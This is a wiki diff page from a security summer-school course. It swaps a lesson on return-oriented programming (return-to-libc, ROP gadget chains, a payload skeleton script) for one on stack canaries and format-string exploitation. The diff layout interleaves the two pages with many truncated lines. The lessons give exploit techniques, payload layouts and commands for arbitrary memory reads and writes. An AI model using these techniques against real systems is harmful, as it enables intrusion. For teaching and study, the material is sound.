This shows you the differences between two versions of the page.
session:11 [2020/07/08 09:32] Liza-Elena BABU (78556) [1. Challenge - Gadget tutorial] |
session:11 [2020/07/19 12:49] (current) |
||
---|---|---|---|
Line 1: | Line 1: | ||
- | = 0x08. Return Oriented Programming | + | ====== 0x0A: Information Leaks ====== |
- | == Resources | + | ===== Slides ===== |
- | [[https:// | + | ===== Resources ===== |
- | [[https:// | + | [[https:// |
- | [[https://security.cs.pub.ro/summer-school/res/arc/11-return-oriented-programming-full.zip|Session' | + | [[https://github.com/hexcellents/ |
+ | ===== Stack Protection (Canaries) ===== | ||
- | === Executable Space Protection | + | The name comes from the canaries (birds) that miners took with them into mines: the birds were affected by toxic gases such as carbon monoxide before the humans were. In our case, stack canaries are used to check whether a buffer overflow of a stack variable has overwritten the return address. The mechanism is based on a (sometimes random) value that is placed on each function' |
- | The **executable space protection** is an instance of the **principle of least privilege**, | + | {{ :session: |
- | The mechanism | + | There are 3 main variations of this mechanism: |
- | **NX bit:** This is the easiest method, and involves an extra bit added to each page table entry that specifies if the memory | + | **Random** canaries are generated when programs start, and are stored in a global variable. The global variable //can// be located in a memory region surrounded by unmapped pages - this protects against information leak attacks (see next section) |
- | **Physical Address Extension (PAE):** Besides | + | The **terminator** canaries contain string termination characters such as '' |
- | **Emulation:** The NX bit can be emulated on older (i.e., non-PAE) 32-bit processors by overloading | + | The **random XOR** canaries work by applying a XOR-based algorithm having both a random number |
< | < | ||
- | This security feature gets in the way of **just-in-time (JIT)** compilers, which need to produce and write code at runtime, and that is later executed. Since a JIT compiler cannot run in this kind of secured environment, | + | **crt0.o** is a set of initialization routines linked into compiled C programs, and executed before calling '' |
- | + | ||
- | * Slides: | + | |
- | * Paper: [[http:// | + | |
</ | </ | ||
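To make the check concrete, here is a small Python model of a protected frame. It is only a sketch: the frame layout (buffer, then canary, then saved return address), the 16-byte buffer and all function names are assumptions for illustration, not what GCC actually emits. It also shows why canaries and information leaks go together: an attacker who learns the canary value can simply write it back unchanged.

```python
import os
import struct

BUF_SIZE = 16      # hypothetical size of the vulnerable local buffer
CANARY_SIZE = 4    # 32-bit canary, as on i386

def new_frame(canary: bytes, ret_addr: int) -> bytearray:
    """Toy frame, low to high addresses: [buffer][canary][saved return address]."""
    return bytearray(BUF_SIZE) + bytearray(canary) + bytearray(struct.pack("<I", ret_addr))

def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Stand-in for an unbounded copy such as gets(): no check against BUF_SIZE.
    Writes are clipped only at the end of this toy frame."""
    n = min(len(data), len(frame))
    frame[:n] = data[:n]

def canary_intact(frame: bytearray, canary: bytes) -> bool:
    """The check inserted before 'ret': stored copy vs. reference value."""
    return bytes(frame[BUF_SIZE:BUF_SIZE + CANARY_SIZE]) == canary

def saved_return(frame: bytearray) -> int:
    """Saved return address that 'ret' would jump to."""
    return struct.unpack_from("<I", frame, BUF_SIZE + CANARY_SIZE)[0]

canary = os.urandom(CANARY_SIZE)     # random canary, chosen once at start-up
hijack = struct.pack("<I", 0xdeadbeef)

# Blind overflow: the attacker must guess the canary, and almost surely fails.
frame = new_frame(canary, 0x08048442)
unchecked_copy(frame, b"A" * (BUF_SIZE + CANARY_SIZE) + hijack)
print("blind overflow passes check:", canary_intact(frame, canary))

# Leaked canary: the payload writes it back, so the check passes and 'ret' is hijacked.
frame = new_frame(canary, 0x08048442)
unchecked_copy(frame, b"A" * BUF_SIZE + canary + hijack)
print("leaked canary passes check:", canary_intact(frame, canary), hex(saved_return(frame)))
```

The model ignores everything but the three slots that matter, which is enough to see that the canary only protects the return address as long as its value stays secret.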
- | There are of course other implementations in different hardening-oriented projects, such as OpenBSD [[http:// | + | The 3 well-known implementations of stack protections |
- | === Bypassing NX | + | ==== StackGuard ==== |
- | **ret-to-plt/libc.** You can return to the '' | + | The [[https://www.usenix.org/ |
- | + | ||
- | **Return Oriented Programming (ROP).** This is a generalization of the ret-to-* approach that makes use of existing code to execute almost anything. As this is probably one of the most common types of attacks, | + | |
- | + | ||
- | **mprotect().** If the application is using '' | + | |
- | + | ||
- | < | + | |
- | Today we will talk about the first 2 methods to bypass NX. **mprotect()** will be introduced in the next sessions. | + | |
- | </ | + | |
- | + | ||
- | === Address Space Layout Randomization (ASLR) | + | |
- | + | ||
- | Address Space Layout Randomization (ASLR) | + | |
<note important> | <note important> | ||
- | Linux allows 3 options for its ASLR implementation that can be configured using the '' | + | [[http://courses.cs.washington.edu/courses/cse504/ |
- | * **0**: deactivated | + | |
- | * **1**: random stack, vdso, libraries; heap is after code section; random code section (only for PIE-linked binaries) | + | |
- | * **2**: random heap too | + | |
</ | </ | ||
- | Make sure you reactivate ASLR after the previous section of the tutorial, by one of the two options below. | + | ==== StackShield ==== |
- | If you disabled ASLR system-wide, re-enable it using (root access | + | The most notable feature of StackShield, compared to other implementations, |
- | <code bash> | + | ==== ProPolice ==== |
- | ~$ sudo bash -c 'echo 2 > / | + | |
- | </ | + | |
- | If you disabled ASLR at shell level, simply **close | + | ProPolice, proposed by IBM, started from an implementation similar to StackGuard, but evolved and introduced new features. It is currently |
- | We can easily demonstrate the effects on shared libraries by running '' | + | {{ : |
- | ==== PLT and GOT | + | < |
+ | GCC supports 3 levels of stack smashing protection: complete, normal, | ||
+ | </ | ||
- | ASLR is not the only feature that prevents the compiler and the linker from resolving some relocations before the binary is actually running. Shared libraries can also be combined in different ways, so the address of a shared library is first known only while the loader is running. ASLR is orthogonal to this: the loader could assign addresses to libraries in a round-robin fashion, or use ASLR to assign them randomly. | + | Let's compile |
- | Of course, we might be inclined to have the loader simply fix all relocations in the code section after it loaded the libraries, but this breaks the memory access protection of the '' | + | <file c ssp.c> |
+ | void func() { | ||
+ | char buffer[1337]; | ||
+ | return; | ||
+ | } | ||
- | To solve this problem we need another level of indirection: | + | int main() { |
+ | func(); | ||
+ | return 0; | ||
+ | } | ||
+ | </ | ||
- | The PLT is responsible for finding | + | Compile |
- | + | ||
- | Let's take a quick look at the code generated for a shared library call. You can use any binary you like, we'll just show an example from one that simply calls '' | + | |
<code bash> | <code bash> | ||
- | ~$ objdump | + | ~$ CFLAGS=' |
- | </ | + | |
- | <code text> | + | |
- | | + | |
</ | </ | ||
- | We can see that the '' | + | The disassembled code for '' |
<code bash> | <code bash> | ||
- | ~$ readelf | + | ~$ objdump |
</ | </ | ||
- | < | + | < |
- | ... | + | 0804841b < |
- | [12] .plt | + | 804841b: |
- | ... | + | |
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | 8048442: | ||
</ | </ | ||
- | Let' | + | We can observe the random value being read from '' |
- | <code bash> | + | <file text canary.gdb> |
- | ~$ objdump -D -j .plt -M intel hello | grep -A 3 '< | + | set disassembly-flavor |
- | </ | + | file ssp |
- | + | break *0x804842a | |
- | <code text> | + | commands |
- | 080482f0 < | + | p/x $eax |
- | 80482f0: ff 25 00 a0 04 08 jmp DWORD PTR ds: | + | c |
- | 80482f6: 68 00 00 00 00 | + | end |
- | 80482fb: e9 e0 ff ff ff | + | run |
- | </code> | + | quit |
+ | </file> | ||
- | We see it jumping to a pointer stored at '' | + | Run using: |
<code bash> | <code bash> | ||
- | ~$ readelf | + | ~$ gdb -x canary.gdb ssp |
</ | </ | ||
- | <code text> | + | ==== Defeating Canaries ==== |
- | ... | + | |
- | Relocation section ' | + | |
- | | + | |
- | 0804a000 | + | |
- | ... | + | |
- | </ | + | |
- | Ok, good, but what is actually | + | This [[http:// |
- | <code bash> | + | For example, the attacker might target: |
- | ~$ objdump -s -M intel -j .got.plt --start-address=0x0804a000 hello | + | * function pointers passed as parameters (pushed onto the stack before calling functions) |
- | </ | + | * the return |
+ | * the old base pointer | ||
+ | * a plain function pointer (local variable) | ||
- | <code text> | + | Buffers could be stored either on the stack, the heap or '' |
- | hello: | + | |
- | Contents of section .got.plt: | + | <note important> |
- | 804a000 f6820408 06830408 16830408 | + | Note that attacks can also be carried out via indirect pointers. The attacker could target a local pointer variable on the stack that is later used as the destination of a write operation, without trying to change the return address directly. If this write can be fully controlled, the attacker can change the return address without ever writing over the canary. |
- | </code> | + | </note> |
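The indirect-pointer case can be sketched with the same kind of toy model. Everything here is hypothetical: the byte layout (a pointer stored between the buffer and the canary), the offsets, and treating addresses as offsets into a single ''bytearray''. The point is only that the overflow stops at the pointer, and the later write through that pointer lands on the saved return address while the canary stays untouched.

```python
import struct

# Hypothetical 32-bit frame, low to high addresses; "addresses" are offsets into mem.
BUF, PTR, CANARY, RET = 0x00, 0x08, 0x0C, 0x10
CANARY_VALUE = b"\x13\x37\xc0\xde"      # arbitrary canary for the sketch

def new_stack() -> bytearray:
    mem = bytearray(RET + 4)
    mem[CANARY:CANARY + 4] = CANARY_VALUE
    struct.pack_into("<I", mem, RET, 0x08048442)   # legitimate return address
    return mem

def victim(mem: bytearray, data: bytes, value: int) -> None:
    """Hypothetical vulnerable function: an unchecked copy into buf[8],
    followed by '*ptr = value' through the local pointer."""
    n = min(len(data), len(mem) - BUF)
    mem[BUF:BUF + n] = data[:n]                      # overflow of buf
    (ptr,) = struct.unpack_from("<I", mem, PTR)      # the (now attacker-chosen) pointer
    struct.pack_into("<I", mem, ptr, value)          # write through the pointer

mem = new_stack()
# 8 bytes fill buf, the next 4 redirect ptr to the saved return address.
victim(mem, b"A" * 8 + struct.pack("<I", RET), 0xdeadbeef)
print("canary untouched:", bytes(mem[CANARY:CANARY + 4]) == CANARY_VALUE)
print("return address:", hex(struct.unpack_from("<I", mem, RET)[0]))
```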
- | We recognize '' | + | Besides indirect attacks, stack canaries can also be defeated if the attacker |
- | <code bash> | ||
- | ~$ objdump -D -j .plt -M intel hello | grep -A 3 ' | ||
- | </ | ||
- | <code text> | + | ===== Format String Exploits ===== |
- | 080482e0 < | + | |
- | | + | |
- | | + | |
- | | + | |
- | </ | + | |
- | < | + | < |
- | Going further into the resolver | + | In the following, '' |
+ | This formality arises from this paper on [[https:// | ||
</ | </ | ||
- | What's going on here? What's actually happening | + | The scenario that enables format string vulnerabilities |
+ | For example: | ||
- | === 00. Tutorial - Bypass NX Stack with return-to-libc | + | <code C> |
+ | void print_something(char* user_input) | ||
+ | { | ||
+ | printf(user_input); | ||
+ | } | ||
+ | </ | ||
- | Go to the '' | + | vs. |
- | In the previous sessions we used stack overflow vulnerabilities to inject new code into a running process | + | <code C> |
- | + | void print_something(char* user_input) | |
- | We will try to bypass this protection for the '' | + | { |
- | + | | |
- | < | + | } |
- | setarch $(uname -m) -R /bin/bash | + | |
</ | </ | ||
+ | ==== Format functions ==== | ||
+ | A number of format functions are defined in the ANSI C standard. There are some basic format string functions on which more complex functions are based, some of which are not part of the standard but are widely available. | ||
+ | Real family members: | ||
+ | * fprintf — prints to a FILE stream | ||
+ | * printf — prints to the ‘stdout’ stream | ||
+ | * sprintf — prints into a string | ||
+ | * snprintf — prints into a string with length checking | ||
+ | * vfprintf — print to a FILE stream from a va_arg structure | ||
+ | * vprintf — prints to ‘stdout’ from a va_arg structure | ||
+ | * vsprintf — prints to a string from a va_arg structure | ||
+ | * vsnprintf — prints to a string with length checking from a va_arg structure | ||
- | Let's take a look at the program headers and confirm that the stack is no longer executable. We only have read and write (RW) permissions for the stack area. | + | == Relatives: == |
+ | * setproctitle — set argv[] | ||
+ | * syslog — output to the syslog facility | ||
+ | * others like err*, verr*, warn*, vwarn* | ||
- | <note important> | + | === Use of format functions === |
- | The auth binary requires the '' | + | To understand where this vulnerability is common in C code, we have to examine the purpose of format functions. |
- | You can find '' | + | == Functionality == |
- | </ | + | * used to convert simple C datatypes to a string representation |
+ | * allow specifying the format of the representation | ||
+ | * process the resulting string (output to stderr, stdout, syslog, | ||
- | <code bash> | + | == How the format function works == |
- | $ checksec 1-random | + | * the format string controls the behaviour of the function |
- | | + | * it specifies the type of parameters |
- | NX: NX enabled | + | |
- | [...] | + | * saved either directly |
- | </ | + | |
- | For completeness, | + | |
- | < | + | |
- | $ python -c 'print " | + | |
- | [0x80484f1] __libc_start_main(0x80486af, 1, 0xbffff454, 0x80486c0, 0x8048730 < | + | |
- | [0x8048601] malloc(20) = 0x0804b008 | + | |
- | [0x80485df] puts("Enter password: "Enter password: | + | |
- | ) = 17 | + | |
- | [0x80485ea] gets(c, 0x8048601, 0x80486af, 0xb7cdecb0, 0xb7cdecb7) | + | |
- | [0x8048652] memset(0x0804b008, ' | + | |
- | [0x8048671] SHA1(0xbfffee63, | + | |
- | [0x41414141] --- SIGSEGV (Segmentation fault) --- | + | |
- | [0xffffffff] +++ killed by SIGSEGV +++ | + | |
- | </ | + | |
- | Check the source file - the buffer length is '' | + | == The calling function == |
+ | * has to know how many parameters | ||
- | We can now jump anywhere. Unfortunately, | + | === What exactly |
- | < | + | A format string |
- | $ python -c 'print " | + | Example: |
- | [0x80484f1] __libc_start_main(0x80486af, | + | < |
- | [0x8048601] malloc(20) | + | printf |
- | [0x80485df] puts("Enter password: "Enter password: | + | |
- | ) = 17 | + | |
- | [0x80485ea] gets(0xbfffee63, 0x8048601, 0x80486af, 0xb7cdecb0, 0xb7cdecb7) = 0xbfffee63 | + | |
- | [0x8048652] memset(0x0804b008, | + | |
- | [0x8048671] SHA1(0xbfffee63, | + | |
- | [0xbfffee63] --- SIGSEGV (Segmentation fault) --- | + | |
- | [0xffffffff] +++ killed by SIGSEGV +++ | + | |
</ | </ | ||
- | Oh, such a bummer! It didn't work. How about we try to jump to some existing code? | + | The text to be printed is "The magic number is:", |
- | < | + | <code>The magic number is: 1911</ |
- | $ objdump -d auth | grep -A 15 "< | + | |
- | 080485ec < | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | 804861b: c7 04 24 01 00 00 00 movl | + | |
- | | + | |
- | | + | |
- | | + | |
- | </ | + | |
- | Let's try '' |
- | < | + | |
- | $ python -c 'print " | + | |
- | [0x80485df] puts(" | + | |
- | ) = 17 | + | |
- | [0x804861b] puts(" | + | |
- | ) = 14 | + | |
- | [0xffffffff] +++ exited (status 1) +++ | + | |
- | </ | + | Some format parameters: |
- | === Return Oriented Programming | + | |
- | {{ : | + | ^ Parameter |
+ | | %d | decimal(int) | ||
+ | | %u | unsigned decimal (unsigned int) | value | | ||
+ | | %x | hexadecimal (unsigned int) | value | | ||
+ | | %s | string ( char *) | reference | ||
+ | | %n | number of bytes written so far, (* int) | reference | ||
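The difference between parameters passed by value and by reference can be illustrated with a toy interpreter. This is a simplified sketch, not glibc's implementation: it understands only an optional ''0'' flag, a field width and the conversions from the table (plus ''%%''), treats the 32-bit words following the format string pointer as a plain list, and models memory as a dict from addresses to Python strings or ints. Every conversion takes the next word, whether or not the caller actually passed one, which is the root of the vulnerability.

```python
import re

CONVERSION = re.compile(r"%(0?)(\d*)([duxsn%])")

def toy_printf(fmt: str, stack: list, memory: dict) -> str:
    """Toy 32-bit printf. 'stack' lists the words that follow the format string
    pointer on the stack (it must be long enough); 'memory' maps addresses to
    str (read by %s) or int (written by %n). Returns the text that would be printed."""
    out = ""
    args = iter(stack)
    pos = 0
    for m in CONVERSION.finditer(fmt):
        out += fmt[pos:m.start()]
        pos = m.end()
        zero, width, conv = m.groups()
        if conv == "%":
            out += "%"
            continue
        word = next(args)            # consumed whether or not it was really passed
        if conv == "n":              # by reference: store the count printed so far
            memory[word] = len(out)
            continue
        if conv == "s":              # by reference: dereference a char *
            text = memory[word]      # a KeyError plays the role of a SIGSEGV
        elif conv == "d":            # by value, signed
            text = str(word - (1 << 32) if word & 0x80000000 else word)
        elif conv == "u":            # by value, unsigned
            text = str(word)
        else:                        # "x": by value, hexadecimal
            text = format(word, "x")
        pad = "0" if zero and conv != "s" else " "
        out += text.rjust(int(width or 0), pad)
    return out + fmt[pos:]

memory = {0x0804a000: "secret", 0xbffff700: 0}
print(toy_printf("%d %u %x", [0xffffffff] * 3, memory))  # -1 4294967295 ffffffff
print(toy_printf("[%s]", [0x0804a000], memory))          # [secret]
toy_printf("foobar%n", [0xbffff700], memory)
print(memory[0xbffff700])                                # 6
```

The same word is read three different ways by ''%d'', ''%u'' and ''%x'', while ''%s'' and ''%n'' use the word as an address: one to read through, the other to write through.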
- | ==== Motivation | + | The '\' |
- | In the previous sessions we discussed | + | Example: |
- | < | + | < |
- | RET + 0x00: addr of system | + | printf ("The magic number is: \x25d\n", |
- | RET + 0x04: | + | |
- | RET + 0x08: | + | |
</ | </ | ||
+ | The code above works, because ' | ||
- | However, what happens when you need to call multiple functions? Say you need to call f1() and then f2(0xAB, 0xCD)? | + | ==== The stack and its role in format strings ==== |
- | < | + | The behaviour |
- | RET + 0x00: | + | < |
- | RET + 0x04: addr of f2 (return address after f1 finishes) | + | printf |
- | RET + 0x08: JUNK (return address after f2 finishes: we don't care about what happens after the 2 functions are called) | + | |
- | RET + 0x0c: 0xAB (param1 of f2) | + | |
- | RET + 0x10: 0xCD (param2 of f2) | + | |
- | </code> | + | |
- | What if we need to call f1(0xAB, 0xCD) and then f2(0xEF, 0x42)? |
- | < | + | |
- | RET + 0x00: addr of f1 | + | |
- | RET + 0x04: addr of f2 (return address after f1 finishes) | + | |
- | RET + 0x08: 0xAB (param1 of f1) | + | |
- | RET + 0x0c: 0xCD (param2 of f1) but this should also be 0xEF (param1 of f2) | + | |
- | RET + 0x10: 0x42 (param2 of f2) | + | |
</ | </ | ||
- | This kind of conflict can be resolved using Return Oriented Programming, | + | From within the '' |
+ | {{ : | ||
- | ==== NOP analogy | + | The format function now parses the format string |
- | While '' | + | should be evaluated. The string " |
- | Let's explore an example: | + | |
- | <code c> | + | |
- | int main() | + | |
- | { | + | |
- | char a[16]; | + | |
- | read(0, a, 100); | + | |
- | return 0; | + | ==== What do we control? ==== |
- | } | + | By supplying the format string we are able to control the behaviour of the format function. We now have to examine what exactly we control, and how to extend this partial control over |
+ | the process to full control of the execution flow. | ||
+ | ==== Crash of the program ==== | ||
+ | By utilizing format strings we can easily trigger some invalid pointer access by just supplying a format string like: | ||
+ | <code C> | ||
+ | printf (" | ||
</ | </ | ||
- | This code obviously suffers | + | Because ' |
- | Remember the NOP sled concept from previous sessions? These were long chains of NOP instructions (" | + | implementations offer the ' |
- | Since we can't add any new code to the program (NX is enabled) how could we simulate the effect of a NOP sled? Easy! Using return instructions! | + | ==== Viewing the stack ==== |
- | < | + | We can show some parts of the stack memory by using a format string like this: |
- | # objdump | + | < |
- | | + | printf (" |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
</ | </ | ||
- | Any of these addresses will work. The payload could be the following: | + | This works because we instruct printf to retrieve five parameters from the stack and display them as zero-padded, 8-digit hexadecimal numbers. A possible output looks like: |
< | < | ||
- | RET + 0x00: | + | 40012980.080628c4.bffff7a4.00000005.08059c04 |
- | RET + 0x04: | + | |
- | RET + 0x08: | + | |
- | RET + 0x0c: | + | |
- | RET + 0x10: | + | |
- | ..... | + | |
</ | </ | ||
- | The original ret (in the normal code flow) will pop RET+0x00 off the stack and jump to it. When it gets popped | + | This is a partial dump of the stack memory, starting from the current bottom of the stack towards the top (assuming the stack grows towards lower addresses). Depending on the size of the format string buffer and the size of the output buffer, you can reconstruct larger or smaller parts of the stack memory |
+ | A stack dump gives important information about the program flow and local function variables and may be very helpful for finding the correct offsets for a successful exploitation. | ||
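The same idea can be sketched in Python to show how such a dump is used to find the offset of the format string itself. The leftover stack words are the ones from the example output above; placing the format string right after them, assuming it is 4-byte aligned, and using ''AAAA'' as a marker are assumptions of the sketch.

```python
import struct

# Leftover words taken from the example dump; the rest of the layout is hypothetical.
LEFTOVERS = [0x40012980, 0x080628C4, 0xBFFFF7A4, 0x00000005, 0x08059C04]

def dump(stack_words: list, count: int) -> str:
    """What 'count' %08x conversions print, joined by '.'."""
    return ".".join("%08x" % w for w in stack_words[:count])

def words_of(buf: bytes) -> list:
    """Little-endian 32-bit words of a stack-resident buffer (zero-padded to 4 bytes)."""
    buf += b"\0" * (-len(buf) % 4)
    return [w for (w,) in struct.iter_unpack("<I", buf)]

def pops_to_marker(stack_words: list, marker: int = 0x41414141) -> int:
    """How many %08x must be consumed before the next conversion reads 'marker'."""
    return stack_words.index(marker)

fmt = b"AAAA" + b"%08x." * 8
stack = LEFTOVERS + words_of(fmt)  # hypothetical: format string right after the leftovers
print(dump(stack, 5))              # 40012980.080628c4.bffff7a4.00000005.08059c04
print(pops_to_marker(stack))       # 5
```

In practice one simply increases the number of ''%08x'' until ''41414141'' shows up in the output; if it never appears cleanly, the format string is misaligned and needs 1 to 3 bytes of padding.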
+ | ==== Viewing memory | ||
+ | It is also possible to peek at memory locations different from the stack memory. To do this we have to get the format function to display memory from an address we can supply. | ||
+ | This poses two problems to us: | ||
+ | * First, we have to find a format parameter which uses an address | ||
+ | * Secondly, we have to supply | ||
+ | We are lucky in the first case, since the '%s' | ||
+ | The remaining problem is how to get that address onto the stack, into the right place. | ||
- | That payload is not the only option. We don't really care which '' | ||
- | < | ||
- | RET + 0x00: | ||
- | RET + 0x04: | ||
- | RET + 0x08: | ||
- | RET + 0x0c: | ||
- | RET + 0x10: | ||
- | ..... | ||
- | </ | ||
- | Notice the addresses are different but because they all point to a '' | ||
- | <note warning> | + | Our format string is usually located on the stack itself, so we already have nearly full control over the space where the format string lies. |
- | Take a moment | + | The format function internally maintains |
- | Follow along using this skeleton | + | If we would be able to get this pointer pointing into a memory space we can control, we can supply an address to the ' |
+ | <note important> | ||
+ | For re-creating the following attack you should place the string passed to '' | ||
</ | </ | ||
- | <file python skel.py> | + | To modify the stack pointer we can simply use dummy parameters that will ' |
- | #!/usr/ | + | <code C> |
- | import struct, sys | + | printf (" |
+ | </code> | ||
+ | The ' | ||
+ | After enough of these increasing parameters, the stack pointer points into our own memory: the format string itself. | ||
+ | The format function always maintains the lowest stack frame, so if our buffer lies on the stack at all, it is guaranteed to lie above the current stack pointer. | ||
+ | If we choose the number of ‘%08x’ parameters correctly, we could just display memory from an arbitrary address, by appending ' | ||
- | def dw(i): | + | In our case the address is illegal and would be ' |
- | return struct.pack("< | + | Example: |
- | #TODO update count for your prog | ||
- | pad_count_to_ret = 100 | ||
- | payload = " | ||
- | |||
- | #TODO figure out the rop chain | ||
- | payload += dw(0xcafebeef) | ||
- | payload += dw(0xdeadc0de) | ||
- | |||
- | |||
- | sys.stdout.write(payload) | ||
- | |||
- | </ | ||
- | |||
- | |||
- | ==== Gadgets & ROP chains | ||
- | Now that we have a sort of neutral primitive equivalent to a NOP, let's actually do something useful. |
- | The building blocks of ROP payloads are called gadgets. These are blocks of instructions that end with a ' | ||
- | Here are some ' | ||
< | < | ||
- | 0x8048443: pop ebp; ret | + | address = 0x08480110 |
- | 0x80484a7: pop edi; pop ebp; ret | + | address (encoded as 32 bit le string): " |
- | 0x8048441: mov ebp,esp; pop ebp; ret | + | |
- | 0x80482da: pop eax; pop ebx; leave; ret | + | |
- | 0x80484c3: pop ecx; pop ebx; leave; ret | + | |
</ | </ | ||
- | By carefully stitching such gadgets on the stack we can bring code execution to almost any context we want. | + | < |
- | As an example let's say we would like to load 0x41424344 into eax and 0x61626364 into ebx. The payload should look like: | + | printf |
- | < | + | |
- | RET + 0x00: | + | |
- | RET + 0x04: | + | |
- | RET + 0x08: | + | |
- | RET + 0x0c: | + | |
</ | </ | ||
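Building such a payload by hand is error-prone, so here is a small helper. It is a sketch under assumptions: the layout (address, then a run of ''%08x.'' to walk the argument pointer, then ''%s'' between ''|'' markers), the helper name and the number of pops are hypothetical and must be adjusted to the target; it also assumes the format string sits 4-byte aligned on the stack. It refuses addresses containing a 0x00 byte, because printf stops at the first NUL in the format string.

```python
import struct

def read_payload(addr: int, pops: int) -> bytes:
    """Format string that makes printf print the C string stored at 'addr'.
    The first 4 bytes are the little-endian address; 'pops' %08x conversions
    move the argument pointer onto them, and %s then dereferences them."""
    packed = struct.pack("<I", addr)
    if b"\0" in packed:
        raise ValueError("address contains a NUL byte and would truncate the format string")
    return packed + b"%08x." * pops + b"|%s|"

payload = read_payload(0x08480110, 5)
print(payload)   # b'\x10\x01H\x08%08x.%08x.%08x.%08x.%08x.|%s|'
```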
- | * First the ret addr is popped from the stack and execution goes there. | ||
- | * At '' | ||
- | * At '' | ||
- | * At '' | ||
- | * At '' | ||
- | We have now seen how gadgets can be useful if we want the CPU to achieve | + | This will dump memory from 0x08480110 until a NULL byte is reached. By increasing the memory address dynamically |
- | As an example, if we want to call f1(0xAB, 0xCD, 0xEF) on x86_64 we first need to know the calling convention for the first three parameters: | + | It is even possible |
- | * 1st param: RDI | + | |
- | * 2nd param: RSI | + | |
- | * 3rd param: RDX | + | |
- | Next we would need gadgets for each. Let's assume these 2 scenarios: | + | |
- | Scenario 1: | + | |
- | < | + | |
- | 0x400124: | + | |
- | 0x400235: | + | |
- | 0x400440: | + | |
- | Payload: | + | If we cannot reach the exact format string boundary by using 4-Byte pops (' |
- | RET + 0x00: | + | This is analogous to the alignment in buffer overflow exploits. |
- | RET + 0x08: | + | |
- | RET + 0x10: val of RSI (0xCD) | + | ==== Exploitation - through pure format strings ==== |
- | RET + 0x18: | + | Our goal in the case of exploitation is to control the instruction pointer, i.e. we want to extend our very limited control (the ability to control the behaviour of the format function) to real execution control, that is, executing our raw machine code. |
- | RET + 0x20: val of RDX | + | Let's take a look at the following code: |
- | RET + 0x28: f1 | + | <code C> |
+ | { | ||
+ | char buffer[512]; | ||
+ | snprintf (buffer, sizeof | ||
+ | buffer[sizeof | ||
+ | } | ||
</ | </ | ||
+ | In the code above it is not possible to enlarge our buffer by inserting some kind of ' | ||
+ | At first it may look as if we cannot do anything useful, apart from crashing the program and inspecting some memory. | ||
- | Scenario 2: | + | Let's recall the format parameters mentioned earlier. There is the ' |
- | < | + | The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack. |
- | 0x400125: | + | Example: |
- | 0x400252: | + | < |
- | 0x400235: | + | int i; |
- | 0x400440: | + | printf |
- | + | printf | |
- | Payload: | + | |
- | RET + 0x00: | + | |
- | RET + 0x08: val of RDI (0xAB) | + | |
- | RET + 0x10: | + | |
- | RET + 0x18: val of RSI (0xCD) | + | |
- | RET + 0x20: | + | |
- | RET + 0x28: val of RDX | + | |
- | RET + 0x30: f1 | + | |
</ | </ | ||
- | Notice that because the architecture is 64 bits wide, the values on the stack are not dwords but qwords (quad words: 8 bytes wide) | + | Would print "i = 6". With the same method |
- | + | ||
- | + | ||
- | The second use of gadgets is to clear the stack. Remember | + | |
- | We need to call f1(0xAB, 0xCD) and then f2(0xEF, 0x42). Our initial solution was: | + | |
< | < | ||
- | RET + 0x00: addr of f1 | + | " |
- | RET + 0x04: addr of f2 (return address after f1 finishes) | + | |
- | RET + 0x08: 0xAB (param1 of f1) | + | |
- | RET + 0x0c: 0xCD (param2 of f1) but this should also be 0xEF (param1 of f2) | + | |
- | RET + 0x10: 0x42 (param2 of f2) | + | |
</ | </ | ||
- | The problem is that those parameters | + | With the ' |
- | + | We do this until this pointer points | |
- | < | + | The ' |
- | RET + 0x00: addr of f1 | + | But if we supply a correctly mapped, writable address, this works and we overwrite four bytes (sizeof |
- | RET + 0x04: addr of (pop eax, pop ebx, ret) | + | |
- | RET + 0x08: | + | |
- | RET + 0x0c: | + | |
- | RET + 0x10: addr of f2 | + | |
- | RET + 0x14: | + | |
- | RET + 0x18: 0xEF (param1 of f2) | + | |
- | RET + 0x1c: 0x42 (param2 of f2) | + | |
- | </ | + | |
- | Now we can even call the next function f3 if we repeat | + | |
< | < | ||
- | RET + 0x00: addr of f1 | + | " |
- | RET + 0x04: addr of (pop eax, pop ebx, ret) | + | |
- | RET + 0x08: 0xAB (param1 of f1) | + | |
- | RET + 0x0c: 0xCD (param2 of f1) | + | |
- | RET + 0x10: addr of f2 | + | |
- | RET + 0x14: addr of (pop eax, pop ebx, ret) | + | |
- | RET + 0x18: 0xEF (param1 of f2) | + | |
- | RET + 0x1c: 0x42 (param2 of f2) | + | |
- | RET + 0x20: addr of f3 | + | |
</ | </ | ||
+ | The format string above will overwrite four bytes at 0xbfffc8c0 with a small integer number. | ||
+ | We have reached one of our goals: we can write to arbitrary addresses. We cannot yet control the number we are writing, but that will change. | ||
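A sketch of the same kind of payload for ''%n'', again with a hypothetical layout (the 4-byte target address, then a number of ''%08x.'' pops, then a final ''%n'') and hypothetical helper names. Since a 32-bit word never needs more than 8 hex digits, each ''%08x.'' prints exactly 9 characters, so the small integer that gets written can be predicted in advance.

```python
import struct

def write_payload(addr: int, pops: int) -> bytes:
    """Format string that stores printf's character count at 'addr' via %n."""
    packed = struct.pack("<I", addr)
    if b"\0" in packed:
        raise ValueError("address contains a NUL byte")
    return packed + b"%08x." * pops + b"%n"

def value_written(pops: int) -> int:
    """Characters printed before %n: 4 raw address bytes + 9 per '%08x.'."""
    return 4 + 9 * pops

payload = write_payload(0xbfffc8c0, 5)
print(payload[:4].hex(), value_written(5))   # c0c8ffbf 49
```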
- | === Some useful ninja tricks | + | The number we are writing (the count of characters written by the format function) depends on the format string. |
- | + | Since we control the format string, we can at least influence this counter by writing more or fewer bytes: |
- | ==== Memory spraying | + | < |
- | Let' | + | int a; |
- | < | + | printf |
- | int main() | + | /* a == 10 */ |
- | { | + | int a; |
- | int x, y ,z; | + | printf |
- | | + | /* a == 150 */ |
- | char buf[23]; | + | |
- | read(0, buf, 100); | + | |
- | + | ||
- | return 0; | + | |
- | } | + | |
</ | </ | ||
+ | By using a dummy parameter ' | ||
+ | But for writing large numbers, such as addresses, this is not sufficient, so we have to find a way to write arbitrary data. | ||
